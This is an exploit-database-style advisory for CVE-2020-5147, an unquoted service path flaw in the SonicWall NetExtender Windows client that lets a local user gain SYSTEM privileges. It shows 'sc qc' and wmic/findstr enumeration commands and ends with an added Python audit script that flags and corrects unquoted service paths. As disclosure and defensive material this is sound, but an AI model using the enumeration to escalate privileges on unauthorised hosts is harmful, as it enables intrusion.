# Exploit Title: SonicWall NetExtender 10.2.0.300 - Unquoted Service Path
# Exploit Author: shinnai
# Software Link: https://www.sonicwall.com/products/remote-access/vpn-clients/
# Version: 10.2.0.300
# Tested On: Windows
# CVE: CVE-2020-5147
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Title: SonicWall NetExtender Windows client unquoted service path vulnerability
Vers.: 10.2.0.300
Down.: https://www.sonicwall.com/products/remote-access/vpn-clients/
Advisory: https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0023
CVE ID: CVE-2020-5147 (https://nvd.nist.gov/vuln/detail/CVE-2020-5147)
URLs:
https://besteffortteam.it/sonicwall-netextender-windows-client-unquoted-service-path-vulnerability/
https://shinnai.altervista.org/exploits/SH-029-20210109.html
Desc.:
The SonicWall NetExtender Windows client is affected by an unquoted service
path vulnerability, which allows a local attacker to gain elevated privileges
in the host operating system.
This vulnerability impacts SonicWall NetExtender Windows client version
10.2.300 and earlier.
PoC:
C:\>sc qc sonicwall_client_protection_svc
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: sonicwall_client_protection_svc
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files\SonicWall\Client Protection Service\SonicWallClientProtectionService.exe <-- Unquoted Service Path Vulnerability
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : SonicWall Client Protection Service
DIPENDENZE :
SERVICE_START_NAME : LocalSystem
C:\>
----------------------------------------------------------------------------------------------------------------------------------------------------------------------
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
SonicWall Client Protection Service sonicwall_client_protection_svc C:\Program Files\SonicWall\Client Protection Service\SonicWallClientProtectionService.exe Auto
C:\>
----------------------------------------------------------------------------------------------------------------------------------------------------------------------
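The following audit check is an added example, not part of the original advisory or of SonicWall's software. It goes beyond the findstr filter above by separating the program from its arguments, so it flags only service paths whose executable part contains a space and is not quoted, and it emits the quoted form. The function names and every sample service except the first are hypothetical and constructed.

```python
import re

# The program part of an unquoted ImagePath ends at the first executable extension.
_EXE_END = re.compile(r"\.(?:exe|com|bat|cmd)(?=\s|$)", re.IGNORECASE)

def split_image_path(image_path):
    """Split a service ImagePath into (program, arguments, was_quoted)."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end == -1:                      # malformed: opening quote never closed
            return s[1:], "", True
        return s[1:end], s[end + 1:].strip(), True
    m = _EXE_END.search(s)
    if m is None:                          # e.g. kernel drivers (.sys): no arguments assumed
        return s, "", False
    return s[:m.end()], s[m.end():].strip(), False

def needs_quoting(image_path):
    """True when the program path contains a space and is not quoted."""
    program, _, quoted = split_image_path(image_path)
    return not quoted and " " in program

def quoted_form(image_path):
    """Return the ImagePath with the program part quoted, arguments preserved."""
    program, args, _ = split_image_path(image_path)
    return f'"{program}"' + (f" {args}" if args else "")

def audit(services):
    """Return [(name, current, corrected)] for services that need quoting."""
    return [(name, path, quoted_form(path))
            for name, path in services.items() if needs_quoting(path)]

# Constructed inventory; only the first entry is taken from the advisory above.
SAMPLE = {
    "sonicwall_client_protection_svc":
        r"C:\Program Files\SonicWall\Client Protection Service\SonicWallClientProtectionService.exe",
    "example_quoted_svc": r'"C:\Program Files\Example Vendor\agent.exe" --service',
    "example_args_svc": r"C:\Windows\System32\svchost.exe -k netsvcs -p",
    "example_unquoted_args_svc": r"C:\Program Files\Example Vendor\updater.exe /svc",
}

if __name__ == "__main__":
    for name, current, corrected in audit(SAMPLE):
        print(f"{name}\n  current:   {current}\n  corrected: {corrected}")
```

On a Windows host the input strings are the ImagePath values under HKLM\SYSTEM\CurrentControlSet\Services\<name>.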